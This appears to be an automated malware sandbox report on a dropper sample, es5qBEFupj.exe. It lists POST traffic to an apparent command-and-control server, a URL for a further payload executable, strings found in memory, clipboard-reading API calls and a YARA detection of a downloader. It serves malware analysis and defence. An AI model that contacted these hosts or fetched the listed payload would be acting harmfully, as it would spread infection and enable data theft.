Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G7DEZVA16LULIC39DTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20399Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X9PI53GFX9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1177Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EH2DXUTULUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552292Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0012D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

21_2_0012D889

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top
Source: global traffic	DNS traffic detected: DNS query: spuriotis.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:34:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:34:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, Set-up.exe, 00000008.00000003.1524058618.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.1527089171.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.1526147549.0000000000AF9000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000008.00000003.1524131578.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1
Source: Set-up.exe, 00000008.00000003.1525266864.000000000130B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000008.00000002.1526147549.0000000000AF9000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000007.00000000.1286723336.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000007539000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000000.1364045625.0000000000185000.00000002.00000001.01000000.0000000B.sdmp, Fingers.18.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore
Source: Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://razaseoexpertinbd.com/Assaac.exe
Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://razaseoexpertinbd.com/Assaac.exeb
Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://razaseoexpertinbd.com/Assaac.exeu9
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/
Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/-
Source: Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/3
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/api
Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click:443/api
Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click:443/apiocal
Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: Climb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Fingers.18.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Fingers.18.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Climb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49801 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 7_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

7_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0012F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		21_2_0012F7C7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_052E1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,		21_2_052E1000

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0012F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

21_2_0012F55C

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

7_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_00149FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

21_2_00149FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.es5qBEFupj.exe.340000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: es5qBEFupj.exe	Static PE information: section name:
Source: es5qBEFupj.exe	Static PE information: section name: .idata
Source: es5qBEFupj.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_00124763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

21_2_00124763

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

